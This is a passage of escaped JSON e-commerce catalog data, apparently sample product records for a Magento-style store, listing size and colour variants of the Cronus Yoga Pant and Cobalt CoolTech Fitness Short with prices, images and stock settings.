p\\/mp12-red_main.jpg\",\"thumbnail_label\":null,\"_media_image\":null,\"_store\":null,\"_attribute_set\":\"Bottom\",\"_product_websites\":\"base\",\"status\":\"1\",\"news_from_date\":null,\"news_to_date\":null,\"options_container\":null,\"minimal_price\":null,\"msrp\":null,\"msrp_enabled\":null,\"special_from_date\":null,\"special_to_date\":null,\"min_qty\":\"0\",\"backorders\":\"0\",\"min_sale_qty\":\"1\",\"max_sale_qty\":\"0\",\"notify_stock_qty\":null,\"meta_keyword\":null,\"has_options\":\"0\",\"required_options\":\"0\",\"size\":\"34\",\"color\":\"Red\"},\"830\":{\"sku\":\"MP12-36-Black\",\"store_view_code\":null,\"attribute_set_code\":\"Bottom\",\"product_type\":\"simple\",\"categories\":\"Default Category\\/Men\\/Bottoms\\/Pants,Default Category\\/Promotions\\/Pants,Default Category\",\"product_websites\":\"base\",\"name\":\"Cronus Yoga Pant -36-Black\",\"description\":\"<p>Guys who love yoga love this all-purpose yoga pant. Designed for yoga, gym and lounge, the Cronus Yoga Pant is a loose-fitting, classic-style pant made from a lightweight blend of cotton, recycled polyester and a touch of Spandex for the stretch factor.<\\/p>\\n<p>&bull; Drawstring waist.<br \\/>&bull; Loose, straight-leg fit.<br \\/>&bull; Lightweight cotton-recycled blend.<br \\/>&bull; Front pockets with stitching detail.<br \\/>&bull; Elastic ankle.<\\/p>\",\"short_description\":null,\"weight\":\"1\",\"product_online\":\"1\",\"tax_class_name\":\"Taxable Goods\",\"visibility\":\"Not Visible Individually\",\"price\":\"48\",\"special_price\":null,\"special_price_from_date\":null,\"special_price_to_date\":null,\"url_key\":\"cronus-yoga-pant-36-black\",\"meta_title\":null,\"meta_keywords\":null,\"meta_description\":null,\"base_image\":\"\\/m\\/p\\/mp12-black_main.jpg\",\"base_image_label\":null,\"small_image\":\"\\/m\\/p\\/mp12-black_main.jpg\",\"small_image_label\":null,\"thumbnail_image\":\"\\/m\\/p\\/mp12-black_main.jpg\",\"thumbnail_image_label\":null,\"created_at\":null,\"updated_at\":null,\"new_from_date\":null,\"new_to_date\":null,\"display_product_options_in\":null,\"map_price\":null,\"msrp_price\":null,\"map_enabled\":null,\"gift_message_available\":null,\"custom_design\":null,\"custom_design_from\":null,\"custom_design_to\":null,\"custom_layout_update\":null,\"page_layout\":null,\"product_options_container\":null,\"msrp_display_actual_price_type\":null,\"country_of_manufacture\":null,\"additional_attributes\":\"has_options=0,required_options=0,size=36,color=Black\",\"qty\":\"100\",\"out_of_stock_qty\":\"0\",\"use_config_min_qty\":\"1\",\"is_qty_decimal\":\"0\",\"allow_backorders\":\"0\",\"use_config_backorders\":\"1\",\"min_cart_qty\":\"1\",\"use_config_min_sale_qty\":\"1\",\"max_cart_qty\":\"0\",\"use_config_max_sale_qty\":\"1\",\"is_in_stock\":\"1\",\"notify_on_stock_below\":null,\"use_config_notify_stock_qty\":\"1\",\"manage_stock\":\"0\",\"use_config_manage_stock\":\"1\",\"use_config_qty_increments\":\"1\",\"qty_increments\":\"0\",\"use_config_enable_qty_inc\":\"1\",\"enable_qty_increments\":\"0\",\"is_decimal_divided\":\"0\",\"website_id\":\"1\",\"configurable_variations\":null,\"configurable_variation_prices\":null,\"configurable_variation_labels\":null,\"additional_images\":\"\\/m\\/p\\/mp12-black_back.jpg\",\"image\":\"\\/m\\/p\\/mp12-black_main.jpg\",\"image_label\":null,\"thumbnail\":\"\\/m\\/p\\/mp12-black_main.jpg\",\"thumbnail_label\":null,\"_media_image\":\"\\/m\\/p\\/mp12-black_back.jpg\",\"_store\":null,\"_attribute_set\":\"Bottom\",\"_product_websites\":\"base\",\"status\":\"1\",\"news_from_date\":null,\"news_to_date\":null,\"options_container\":null,\"minimal_price\":null,\"msrp\":null,\"msrp_enabled\":null,\"special_from_date\":null,\"special_to_date\":null,\"min_qty\":\"0\",\"backorders\":\"0\",\"min_sale_qty\":\"1\",\"max_sale_qty\":\"0\",\"notify_stock_qty\":null,\"meta_keyword\":null,\"has_options\":\"0\",\"required_options\":\"0\",\"size\":\"36\",\"color\":\"Black\"},\"831\":{\"sku\":\"MP12-36-Blue\",\"store_view_code\":null,\"attribute_set_code\":\"Bottom\",\"product_type\":\"simple\",\"categories\":\"Default Category\\/Men\\/Bottoms\\/Pants,Default Category\\/Promotions\\/Pants,Default Category\",\"product_websites\":\"base\",\"name\":\"Cronus Yoga Pant -36-Blue\",\"description\":\"<p>Guys who love yoga love this all-purpose yoga pant. Designed for yoga, gym and lounge, the Cronus Yoga Pant is a loose-fitting, classic-style pant made from a lightweight blend of cotton, recycled polyester and a touch of Spandex for the stretch factor.<\\/p>\\n<p>&bull; Drawstring waist.<br \\/>&bull; Loose, straight-leg fit.<br \\/>&bull; Lightweight cotton-recycled blend.<br \\/>&bull; Front pockets with stitching detail.<br \\/>&bull; Elastic ankle.<\\/p>\",\"short_description\":null,\"weight\":\"1\",\"product_online\":\"1\",\"tax_class_name\":\"Taxable Goods\",\"visibility\":\"Not Visible Individually\",\"price\":\"48\",\"special_price\":null,\"special_price_from_date\":null,\"special_price_to_date\":null,\"url_key\":\"cronus-yoga-pant-36-blue\",\"meta_title\":null,\"meta_keywords\":null,\"meta_description\":null,\"base_image\":\"\\/m\\/p\\/mp12-blue_main.jpg\",\"base_image_label\":null,\"small_image\":\"\\/m\\/p\\/mp12-blue_main.jpg\",\"small_image_label\":null,\"thumbnail_image\":\"\\/m\\/p\\/mp12-blue_main.jpg\",\"thumbnail_image_label\":null,\"created_at\":null,\"updated_at\":null,\"new_from_date\":null,\"new_to_date\":null,\"display_product_options_in\":null,\"map_price\":null,\"msrp_price\":null,\"map_enabled\":null,\"gift_message_available\":null,\"custom_design\":null,\"custom_design_from\":null,\"custom_design_to\":null,\"custom_layout_update\":null,\"page_layout\":null,\"product_options_container\":null,\"msrp_display_actual_price_type\":null,\"country_of_manufacture\":null,\"additional_attributes\":\"has_options=0,required_options=0,size=36,color=Blue\",\"qty\":\"100\",\"out_of_stock_qty\":\"0\",\"use_config_min_qty\":\"1\",\"is_qty_decimal\":\"0\",\"allow_backorders\":\"0\",\"use_config_backorders\":\"1\",\"min_cart_qty\":\"1\",\"use_config_min_sale_qty\":\"1\",\"max_cart_qty\":\"0\",\"use_config_max_sale_qty\":\"1\",\"is_in_stock\":\"1\",\"notify_on_stock_below\":null,\"use_config_notify_stock_qty\":\"1\",\"manage_stock\":\"0\",\"use_config_manage_stock\":\"1\",\"use_config_qty_increments\":\"1\",\"qty_increments\":\"0\",\"use_config_enable_qty_inc\":\"1\",\"enable_qty_increments\":\"0\",\"is_decimal_divided\":\"0\",\"website_id\":\"1\",\"configurable_variations\":null,\"configurable_variation_prices\":null,\"configurable_variation_labels\":null,\"additional_images\":null,\"image\":\"\\/m\\/p\\/mp12-blue_main.jpg\",\"image_label\":null,\"thumbnail\":\"\\/m\\/p\\/mp12-blue_main.jpg\",\"thumbnail_label\":null,\"_media_image\":null,\"_store\":null,\"_attribute_set\":\"Bottom\",\"_product_websites\":\"base\",\"status\":\"1\",\"news_from_date\":null,\"news_to_date\":null,\"options_container\":null,\"minimal_price\":null,\"msrp\":null,\"msrp_enabled\":null,\"special_from_date\":null,\"special_to_date\":null,\"min_qty\":\"0\",\"backorders\":\"0\",\"min_sale_qty\":\"1\",\"max_sale_qty\":\"0\",\"notify_stock_qty\":null,\"meta_keyword\":null,\"has_options\":\"0\",\"required_options\":\"0\",\"size\":\"36\",\"color\":\"Blue\"},\"832\":{\"sku\":\"MP12-36-Red\",\"store_view_code\":null,\"attribute_set_code\":\"Bottom\",\"product_type\":\"simple\",\"categories\":\"Default Category\\/Men\\/Bottoms\\/Pants,Default Category\\/Promotions\\/Pants,Default Category\",\"product_websites\":\"base\",\"name\":\"Cronus Yoga Pant -36-Red\",\"description\":\"<p>Guys who love yoga love this all-purpose yoga pant. Designed for yoga, gym and lounge, the Cronus Yoga Pant is a loose-fitting, classic-style pant made from a lightweight blend of cotton, recycled polyester and a touch of Spandex for the stretch factor.<\\/p>\\n<p>&bull; Drawstring waist.<br \\/>&bull; Loose, straight-leg fit.<br \\/>&bull; Lightweight cotton-recycled blend.<br \\/>&bull; Front pockets with stitching detail.<br \\/>&bull; Elastic ankle.<\\/p>\",\"short_description\":null,\"weight\":\"1\",\"product_online\":\"1\",\"tax_class_name\":\"Taxable Goods\",\"visibility\":\"Not Visible Individually\",\"price\":\"48\",\"special_price\":null,\"special_price_from_date\":null,\"special_price_to_date\":null,\"url_key\":\"cronus-yoga-pant-36-red\",\"meta_title\":null,\"meta_keywords\":null,\"meta_description\":null,\"base_image\":\"\\/m\\/p\\/mp12-red_main.jpg\",\"base_image_label\":null,\"small_image\":\"\\/m\\/p\\/mp12-red_main.jpg\",\"small_image_label\":null,\"thumbnail_image\":\"\\/m\\/p\\/mp12-red_main.jpg\",\"thumbnail_image_label\":null,\"created_at\":null,\"updated_at\":null,\"new_from_date\":null,\"new_to_date\":null,\"display_product_options_in\":null,\"map_price\":null,\"msrp_price\":null,\"map_enabled\":null,\"gift_message_available\":null,\"custom_design\":null,\"custom_design_from\":null,\"custom_design_to\":null,\"custom_layout_update\":null,\"page_layout\":null,\"product_options_container\":null,\"msrp_display_actual_price_type\":null,\"country_of_manufacture\":null,\"additional_attributes\":\"has_options=0,required_options=0,size=36,color=Red\",\"qty\":\"100\",\"out_of_stock_qty\":\"0\",\"use_config_min_qty\":\"1\",\"is_qty_decimal\":\"0\",\"allow_backorders\":\"0\",\"use_config_backorders\":\"1\",\"min_cart_qty\":\"1\",\"use_config_min_sale_qty\":\"1\",\"max_cart_qty\":\"0\",\"use_config_max_sale_qty\":\"1\",\"is_in_stock\":\"1\",\"notify_on_stock_below\":null,\"use_config_notify_stock_qty\":\"1\",\"manage_stock\":\"0\",\"use_config_manage_stock\":\"1\",\"use_config_qty_increments\":\"1\",\"qty_increments\":\"0\",\"use_config_enable_qty_inc\":\"1\",\"enable_qty_increments\":\"0\",\"is_decimal_divided\":\"0\",\"website_id\":\"1\",\"configurable_variations\":null,\"configurable_variation_prices\":null,\"configurable_variation_labels\":null,\"additional_images\":null,\"image\":\"\\/m\\/p\\/mp12-red_main.jpg\",\"image_label\":null,\"thumbnail\":\"\\/m\\/p\\/mp12-red_main.jpg\",\"thumbnail_label\":null,\"_media_image\":null,\"_store\":null,\"_attribute_set\":\"Bottom\",\"_product_websites\":\"base\",\"status\":\"1\",\"news_from_date\":null,\"news_to_date\":null,\"options_container\":null,\"minimal_price\":null,\"msrp\":null,\"msrp_enabled\":null,\"special_from_date\":null,\"special_to_date\":null,\"min_qty\":\"0\",\"backorders\":\"0\",\"min_sale_qty\":\"1\",\"max_sale_qty\":\"0\",\"notify_stock_qty\":null,\"meta_keyword\":null,\"has_options\":\"0\",\"required_options\":\"0\",\"size\":\"36\",\"color\":\"Red\"},\"833\":{\"sku\":\"MP12\",\"store_view_code\":null,\"attribute_set_code\":\"Bottom\",\"product_type\":\"configurable\",\"categories\":\"Default Category\\/Men\\/Bottoms\\/Pants,Default Category\\/Promotions\\/Pants,Default Category\",\"product_websites\":\"base\",\"name\":\"Cronus Yoga Pant \",\"description\":\"<p>Guys who love yoga love this all-purpose yoga pant. Designed for yoga, gym and lounge, the Cronus Yoga Pant is a loose-fitting, classic-style pant made from a lightweight blend of cotton, recycled polyester and a touch of Spandex for the stretch factor.<\\/p>\\n<p>&bull; Drawstring waist.<br \\/>&bull; Loose, straight-leg fit.<br \\/>&bull; Lightweight cotton-recycled blend.<br \\/>&bull; Front pockets with stitching detail.<br \\/>&bull; Elastic ankle.<\\/p>\",\"short_description\":null,\"weight\":null,\"product_online\":\"1\",\"tax_class_name\":\"Taxable Goods\",\"visibility\":\"Catalog, Search\",\"price\":\"48\",\"special_price\":null,\"special_price_from_date\":null,\"special_price_to_date\":null,\"url_key\":null,\"meta_title\":null,\"meta_keywords\":null,\"meta_description\":null,\"base_image\":\"\\/m\\/p\\/mp12-black_main.jpg\",\"base_image_label\":null,\"small_image\":\"\\/m\\/p\\/mp12-black_main.jpg\",\"small_image_label\":null,\"thumbnail_image\":\"\\/m\\/p\\/mp12-black_main.jpg\",\"thumbnail_image_label\":null,\"created_at\":null,\"updated_at\":null,\"new_from_date\":null,\"new_to_date\":null,\"display_product_options_in\":null,\"map_price\":null,\"msrp_price\":null,\"map_enabled\":null,\"gift_message_available\":null,\"custom_design\":null,\"custom_design_from\":null,\"custom_design_to\":null,\"custom_layout_update\":null,\"page_layout\":null,\"product_options_container\":null,\"msrp_display_actual_price_type\":null,\"country_of_manufacture\":null,\"additional_attributes\":\"has_options=1,required_options=1,style_bottom=Workout Pants|Track Pants|Leggings,material=Polyester|Cotton|Spandex,pattern=Solid,climate=Cool|Indoor|Mild|Spring|Windy|Wintry,eco_collection=No,performance_fabric=No,erin_recommends=No,new=No,sale=No\",\"qty\":\"0\",\"out_of_stock_qty\":\"0\",\"use_config_min_qty\":\"1\",\"is_qty_decimal\":\"0\",\"allow_backorders\":\"0\",\"use_config_backorders\":\"1\",\"min_cart_qty\":\"1\",\"use_config_min_sale_qty\":\"1\",\"max_cart_qty\":\"0\",\"use_config_max_sale_qty\":\"1\",\"is_in_stock\":\"1\",\"notify_on_stock_below\":null,\"use_config_notify_stock_qty\":\"1\",\"manage_stock\":\"0\",\"use_config_manage_stock\":\"1\",\"use_config_qty_increments\":\"1\",\"qty_increments\":\"0\",\"use_config_enable_qty_inc\":\"1\",\"enable_qty_increments\":\"0\",\"is_decimal_divided\":\"0\",\"website_id\":\"1\",\"configurable_variations\":\"sku=MP12-32-Black,size=32,color=Black|sku=MP12-32-Blue,size=32,color=Blue|sku=MP12-32-Red,size=32,color=Red|sku=MP12-33-Black,size=33,color=Black|sku=MP12-33-Blue,size=33,color=Blue|sku=MP12-33-Red,size=33,color=Red|sku=MP12-34-Black,size=34,color=Black|sku=MP12-34-Blue,size=34,color=Blue|sku=MP12-34-Red,size=34,color=Red|sku=MP12-36-Black,size=36,color=Black|sku=MP12-36-Blue,size=36,color=Blue|sku=MP12-36-Red,size=36,color=Red\",\"configurable_variation_prices\":null,\"configurable_variation_labels\":null,\"additional_images\":\"\\/m\\/p\\/mp12-black_back.jpg\",\"image\":\"\\/m\\/p\\/mp12-black_main.jpg\",\"image_label\":null,\"thumbnail\":\"\\/m\\/p\\/mp12-black_main.jpg\",\"thumbnail_label\":null,\"_media_image\":\"\\/m\\/p\\/mp12-black_back.jpg\",\"_store\":null,\"_attribute_set\":\"Bottom\",\"_product_websites\":\"base\",\"status\":\"1\",\"news_from_date\":null,\"news_to_date\":null,\"options_container\":null,\"minimal_price\":null,\"msrp\":null,\"msrp_enabled\":null,\"special_from_date\":null,\"special_to_date\":null,\"min_qty\":\"0\",\"backorders\":\"0\",\"min_sale_qty\":\"1\",\"max_sale_qty\":\"0\",\"notify_stock_qty\":null,\"meta_keyword\":null,\"has_options\":\"1\",\"required_options\":\"1\",\"style_bottom\":\"Workout Pants|Track Pants|Leggings\",\"material\":\"Polyester|Cotton|Spandex\",\"pattern\":\"Solid\",\"climate\":\"Cool|Indoor|Mild|Spring|Windy|Wintry\",\"eco_collection\":\"No\",\"performance_fabric\":\"No\",\"erin_recommends\":\"No\",\"new\":\"No\",\"sale\":\"No\"},\"834\":{\"sku\":\"MSH01-32-Black\",\"store_view_code\":null,\"attribute_set_code\":\"Bottom\",\"product_type\":\"simple\",\"categories\":\"Default Category\\/Men\\/Bottoms\\/Shorts,Default Category\\/Collections\\/Erin Recommends,Default Category\",\"product_websites\":\"base\",\"name\":\"Cobalt CoolTech&trade; Fitness Short-32-Black\",\"description\":\"<p>It\'s not rocket surgery: the hotter your conditions, the more you need to stay cool. That\'s why the Cobalt CoolTech&trade; Fitness Short features built-in technology and side perforations that keep you ventilated and comfortable for the distance. The elastic waist promises a personalized fit.<\\/p>\\n<p>&bull; Light blue nylon shorts.<br \\/>&bull; Relaxed fit. <br \\/>&bull; 5\\\" inseam. <br \\/>&bull; Machine wash\\/dry.<\\/p>\",\"short_description\":null,\"weight\":\"1\",\"product_online\":\"1\",\"tax_class_name\":\"Taxable Goods\",\"visibility\":\"Not Visible Individually\",\"price\":\"44\",\"special_price\":null,\"special_price_from_date\":null,\"special_price_to_date\":null,\"url_key\":\"cobalt-cooltech-trade-fitness-short-32-black\",\"meta_title\":null,\"meta_keywords\":null,\"meta_description\":null,\"base_image\":\"\\/m\\/s\\/msh01-black_main.jpg\",\"base_image_label\":null,\"small_image\":\"\\/m\\/s\\/msh01-black_main.jpg\",\"small_image_label\":null,\"thumbnail_image\":\"\\/m\\/s\\/msh01-black_main.jpg\",\"thumbnail_image_label\":null,\"created_at\":null,\"updated_at\":null,\"new_from_date\":null,\"new_to_date\":null,\"display_product_options_in\":null,\"map_price\":null,\"msrp_price\":null,\"map_enabled\":null,\"gift_message_available\":null,\"custom_design\":null,\"custom_design_from\":null,\"custom_design_to\":null,\"custom_layout_update\":null,\"page_layout\":null,\"product_options_container\":null,\"msrp_display_actual_price_type\":null,\"country_of_manufacture\":null,\"additional_attributes\":\"has_options=0,required_options=0,size=32,color=Black\",\"qty\":\"100\",\"out_of_stock_qty\":\"0\",\"use_config_min_qty\":\"1\",\"is_qty_decimal\":\"0\",\"allow_backorders\":\"0\",\"use_config_backorders\":\"1\",\"min_cart_qty\":\"1\",\"use_config_min_sale_qty\":\"1\",\"max_cart_qty\":\"0\",\"use_config_max_sale_qty\":\"1\",\"is_in_stock\":\"1\",\"notify_on_stock_below\":null,\"use_config_notify_stock_qty\":\"1\",\"manage_stock\":\"0\",\"use_config_manage_stock\":\"1\",\"use_config_qty_increments\":\"1\",\"qty_increments\":\"0\",\"use_config_enable_qty_inc\":\"1\",\"enable_qty_increments\":\"0\",\"is_decimal_divided\":\"0\",\"website_id\":\"1\",\"configurable_variations\":null,\"configurable_variation_prices\":null,\"configurable_variation_labels\":null,\"additional_images\":null,\"image\":\"\\/m\\/s\\/msh01-black_main.jpg\",\"image_label\":null,\"thumbnail\":\"\\/m\\/s\\/msh01-black_main.jpg\",\"thumbnail_label\":null,\"_media_image\":null,\"_store\":null,\"_attribute_set\":\"Bottom\",\"_product_websites\":\"base\",\"status\":\"1\",\"news_from_date\":null,\"news_to_date\":null,\"options_container\":null,\"minimal_price\":null,\"msrp\":null,\"msrp_enabled\":null,\"special_from_date\":null,\"special_to_date\":null,\"min_qty\":\"0\",\"backorders\":\"0\",\"min_sale_qty\":\"1\",\"max_sale_qty\":\"0\",\"notify_stock_qty\":null,\"meta_keyword\":null,\"has_options\":\"0\",\"required_options\":\"0\",\"size\":\"32\",\"color\":\"Black\"},\"835\":{\"sku\":\"MSH01-32-Blue\",\"store_view_code\":null,\"attribute_set_code\":\"Bottom\",\"product_type\":\"simple\",\"categories\":\"Default Category\\/Men\\/Bottoms\\/Shorts,Default Category\\/Collections\\/Erin Recommends,Default Category\",\"product_websites\":\"base\",\"name\":\"Cobalt CoolTech&trade; Fitness Short-32-Blue\",\"description\":\"<p>It\'s not rocket surgery: the hotter your conditions, the more you need to stay cool. That\'s why the Cobalt CoolTech&trade; Fitness Short features built-in technology and side perforations that keep you ventilated and comfortable for the distance. The elastic waist promises a personalized fit.<\\/p>\\n<p>&bull; Light blue nylon shorts.<br \\/>&bull; Relaxed fit. <br \\/>&bull; 5\\\" inseam. <br \\/>&bull; Machine wash\\/dry.<\\/p>\",\"short_description\":null,\"weight\":\"1\",\"product_online\":\"1\",\"tax_class_name\":\"Taxable Goods\",\"visibility\":\"Not Visible Individually\",\"price\":\"44\",\"special_price\":null,\"special_price_from_date\":null,\"special_price_to_date\":null,\"url_key\":\"cobalt-cooltech-trade-fitness-short-32-blue\",\"meta_title\":null,\"meta_keywords\":null,\"meta_description\":null,\"base_image\":\"\\/m\\/s\\/msh01-blue_main.jpg\",\"base_image_label\":null,\"small_image\":\"\\/m\\/s\\/msh01-blue_main.jpg\",\"small_image_label\":null,\"thumbnail_image\":\"\\/m\\/s\\/msh01-blue_main.jpg\",\"thumbnail_image_label\":null,\"created_at\":null,\"updated_at\":null,\"new_from_date\":null,\"new_to_date\":null,\"display_product_options_in\":null,\"map_price\":null,\"msrp_price\":null,\"map_enabled\":null,\"gift_message_available\":null,\"custom_design\":null,\"custom_design_from\":null,\"custom_design_to\":null,\"custom_layout_update\":null,\"page_layout\":null,\"product_options_container\":null,\"msrp_display_actual_price_type\":null,\"country_of_manufacture\":null,\"additional_attributes\":\"has_options=0,required_options=0,size=32,color=Blue\",\"qty\":\"100\",\"out_of_stock_qty\":\"0\",\"use_config_min_qty\":\"1\",\"is_qty_decimal\":\"0\",\"allow_backorders\":\"0\",\"use_config_backorders\":\"1\",\"min_cart_qty\":\"1\",\"use_config_min_sale_qty\":\"1\",\"max_cart_qty\":\"0\",\"use_config_max_sale_qty\":\"1\",\"is_in_stock\":\"1\",\"notify_on_stock_below\":null,\"use_config_notify_stock_qty\":\"1\",\"manage_stock\":\"0\",\"use_config_manage_stock\":\"1\",\"use_config_qty_increments\":\"1\",\"qty_increments\":\"0\",\"use_config_enable_qty_inc\":\"1\",\"enable_qty_increments\":\"0\",\"is_decimal_divided\":\"0\",\"website_id\":\"1\",\"configurable_variations\":null,\"configurable_variation_prices\":null,\"configurable_variation_labels\":null,\"additional_images\":\"\\/m\\/s\\/msh01-blue_back.jpg\",\"image\":\"\\/m\\/s\\/msh01-blue_main.jpg\",\"image_label\":null,\"thumbnail\":\"\\/m\\/s\\/msh01-blue_main.jpg\",\"thumbnail_label\":null,\"_media_image\":\"\\/m\\/s\\/msh01-blue_back.jpg\",\"_store\":null,\"_attribute_set\":\"Bottom\",\"_product_websites\":\"base\",\"status\":\"1\",\"news_from_date\":null,\"news_to_date\":null,\"options_container\":null,\"minimal_price\":null,\"msrp\":null,\"msrp_enabled\":null,\"special_from_date\":null,\"special_to_date\":null,\"min_qty\":\"0\",\"backorders\":\"0\",\"min_sale_qty\":\"1\",\"max_sale_qty\":\"0\",\"notify_stock_qty\":null,\"meta_keyword\":null,\"has_options\":\"0\",\"required_options\":\"0\",\"size\":\"32\",\"color\":\"Blue\"},\"836\":{\"sku\":\"MSH01-32-Red\",\"store_view_code\":null,\"attribute_set_code\":\"Bottom\",\"product_type\":\"simple\",\"categories\":\"Default Category\\/Men\\/Bottoms\\/Shorts,Default Category\\/Collections\\/Erin Recommends,Default Category\",\"product_websites\":\"base\",\"name\":\"Cobalt CoolTech&trade; Fitness Short-32-Red\",\"description\":\"<p>It\'s not rocket surgery: the hotter your conditions, the more you need to stay cool. That\'s why the Cobalt CoolTech&trade; Fitness Short features built-in technology and side perforations that keep you ventilated and comfortable for the distance. The elastic waist promises a personalized fit.<\\/p>\\n<p>&bull; Light blue nylon shorts.<br \\/>&bull; Relaxed fit. <br \\/>&bull; 5\\\" inseam. <br \\/>&bull; Machine wash\\/dry.<\\/p>\",\"short_description\":null,\"weight\":\"1\",\"product_online\":\"1\",\"tax_class_name\":\"Taxable Goods\",\"visibility\":\"Not Visible Individually\",\"price\":\"44\",\"special_price\":null,\"special_price_from_date\":null,\"special_price_to_date\":null,\"url_key\":\"cobalt-cooltech-trade-fitness-short-32-red\",\"meta_title\":null,\"meta_keywords\":null,\"meta_description\":null,\"base_image\":\"\\/m\\/s\\/msh01-red_main.jpg\",\"base_image_label\":null,\"small_image\":\"\\/m\\/s\\/msh01-red_main.jpg\",\"small_image_label\":null,\"thumbnail_image\":\"\\/m\\/s\\/msh01-red_main.jpg\",\"thumbnail_image_label\":null,\"created_at\":null,\"updated_at\":null,\"new_from_date\":null,\"new_to_date\":null,\"display_product_options_in\":null,\"map_price\":null,\"msrp_price\":null,\"map_enabled\":null,\"gift_message_available\":null,\"custom_design\":null,\"custom_design_from\":null,\"custom_design_to\":null,\"custom_layout_update\":null,\"page_layout\":null,\"product_options_container\":null,\"msrp_display_actual_price_type\":null,\"country_of_manufacture\":null,\"additional_attributes\":\"has_options=0,required_options=0,size=32,color=Red\",\"qty\":\"100\",\"out_of_stock_qty\":\"0\",\"use_config_min_qty\":\"1\",\"is_qty_decimal\":\"0\",\"allow_backorders\":\"0\",\"use_config_backorders\":\"1\",\"min_cart_qty\":\"1\",\"use_config_min_sale_qty\":\"1\",\"max_cart_qty\":\"0\",\"use_config_max_sale_qty\":\"1\",\"is_in_stock\":\"1\",\"notify_on_stock_below\":null,\"use_config_notify_stock_qty\":\"1\",\"manage_stock\":\"0\",\"use_config_manage_stock\":\"1\",\"use_config_qty_increments\":\"1\",\"qty_increments\":\"0\",\"use_config_enable_qty_inc\":\"1\",\"enable_qty_increments\":\"0\",\"is_decimal_divided\":\"0\",\"website_id\":\"1\",\"configurable_variations\":null,\"configurable_variation_prices\":null,\"configurable_variation_labels\":null,\"additional_images\":null,\"image\":\"\\/m\\/s\\/msh01-red_main.jpg\",\"image_label\":null,\"thumbnail\":\"\\/m\\/s\\/msh01-red_main.jpg\",\"thumbnail_label\":null,\"_media_image\":null,\"_store\":null,\"_attribute_set\":\"Bottom\",\"_product_websites\":\"base\",\"status\":\"1\",\"news_from_date\":null,\"news_to_date\":null,\"options_container\":null,\"minimal_price\":null,\"msrp\":null,\"msrp_enabled\":null,\"special_from_date\":null,\"special_to_date\":null,\"min_qty\":\"0\",\"backorders\":\"0\",\"min_sale_qty\":\"1\",\"max_sale_qty\":\"0\",\"notify_stock_qty\":null,\"meta_keyword\":null,\"has_options\":\"0\",\"required_options\":\"0\",\"size\":\"32\",\"color\":\"Red\"},\"837\":{\"sku\":\"MSH01-33-Black\",\"store_view_code\":null,\"attribute_set_code\":\"Bottom\",\"product_type\":\"simple\",\"categories\":\"Default Category\\/Men\\/Bottoms\\/Shorts,Default Category\\/Collections\\/Erin Recommends,Default Category\",\"product_websites\":\"base\",\"name\":\"Cobalt CoolTech&trade; Fitness Short-33-Black\",\"description\":\"<p>It\'s not rocket surgery: the hotter your conditions, the more you need to stay cool. That\'s why the Cobalt CoolTech&trade; Fitness Short features built-in technology and side perforations that keep you ventilated and comfortable for the distance. The elastic waist promises a personalized fit.<\\/p>\\n<p>&bull; Light blue nylon shorts.<br \\/>&bull; Relaxed fit. <br \\/>&bull; 5\\\" inseam. <br \\/>&bull; Machine wash\\/dry.<\\/p>\",\"short_description\":null,\"weight\":\"1\",\"product_online\":\"1\",\"tax_class_name\":\"Taxable Goods\",\"visibility\":\"Not Visible Individually\",\"price\":\"44\",\"special_price\":null,\"special_price_from_date\":null,\"special_price_to_date\":null,\"url_key\":\"cobalt-cooltech-trade-fitness-short-33-black\",\"meta_title\":null,\"meta_keywords\":null,\"meta_description\":null,\"base_image\":\"\\/m\\/s\\/msh01-black_main.jpg\",\"base_image_label\":null,\"small_image\":\"\\/m\\/s\\/msh01-black_main.jpg\",\"small_image_label\":null,\"thumbnail_image\":\"\\/m\\/s\\/msh01-black_main.jpg\",\"thumbnail_image_label\":null,\"created_at\":null,\"updated_at\":null,\"new_from_date\":null,\"new_to_date\":null,\"display_product_options_in\":null,\"map_price\":null,\"msrp_price\":null,\"map_enabled\":null,\"gift_message_available\":null,\"custom_design\":null,\"custom_design_from\":null,\"custom_design_to\":null,\"custom_layout_update\":null,\"page_layout\":null,\"product_options_container\":null,\"msrp_display_actual_price_type\":null,\"country_of_manufacture\":null,\"additional_attributes\":\"has_options=0,required_options=0,size=33,color=Black\",\"qty\":\"100\",\"out_of_stock_qty\":\"0\",\"use_config_min_qty\":\"1\",\"is_qty_decimal\":\"0\",\"allow_backorders\":\"0\",\"use_config_backorders\":\"1\",\"min_cart_qty\":\"1\",\"use_config_min_sale_qty\":\"1\",\"max_cart_qty\":\"0\",\"use_config_max_sale_qty\":\"1\",\"is_in_stock\":\"1\",\"notify_on_stock_below\":null,\"use_config_notify_stock_qty\":\"1\",\"manage_stock\":\"0\",\"use_config_manage_stock\":\"1\",\"use_config_qty_increments\":\"1\",\"qty_increments\":\"0\",\"use_config_enable_qty_inc\":\"1\",\"enable_qty_increments\":\"0\",\"is_decimal_divided\":\"0\",\"website_id\":\"1\",\"configurable_variations\":null,\"configurable_variation_prices\":null,\"configurable_variation_labels\":null,\"additional_images\":null,\"image\":\"\\/m\\/s\\/msh01-black_main.jpg\",\"image_label\":null,\"thumbnail\":\"\\/m\\/s\\/msh01-black_main.jpg\",\"thumbnail_label\":null,\"_media_image\":null,\"_store\":null,\"_attribute_set\":\"Bottom\",\"_product_websites\":\"base\",\"status\":\"1\",\"news_from_date\":null,\"news_to_date\":null,\"options_container\":null,\"minimal_price\":null,\"msrp\":null,\"msrp_enabled\":null,\"special_from_date\":null,\"special_to_date\":null,\"min_qty\":\"0\",\"backorders\":\"0\",\"min_sale_qty\":\"1\",\"max_sale_qty\":\"0\",\"notify_stock_qty\":null,\"meta_keyword\":null,\"has_options\":\"0\",\"required_options\":\"0\",\"size\":\"33\",\"color\":\"Black\"},\"838\":{\"sku\":\"MSH01-33-Blue\",\"store_view_code\":null,\"attribute_set_code\":\"Bottom\",\"product_type\":\"simple\",\"categories\":\"Default Category\\/Men\\/Bottoms\\/Shorts,Default Category\\/Collections\\/Erin Recommends,Default Category\",\"product_websites\":\"base\",\"name\":\"Cobalt CoolTech&trade; Fitness Short-33-Blue\",\"description\":\"<p>It\'s not rocket surgery: the hotter your conditions, the more you need to stay cool. That\'s why the Cobalt CoolTech&trade; Fitness Short features built-in technology and side perforations that keep you ventilated and comfortable for the distance. The elastic waist promises a personalized fit.<\\/p>\\n<p>&bull; Light blue nylon shorts.<br \\/>&bull; Relaxed fit. <br \\/>&bull; 5\\\" inseam. <br \\/>&bull; Machine wash\\/dry.<\\/p>\",\"short_description\":null,\"weight\":\"1\",\"product_online\":\"1\",\"tax_class_name\":\"Taxable Goods\",\"visibility\":\"Not Visible 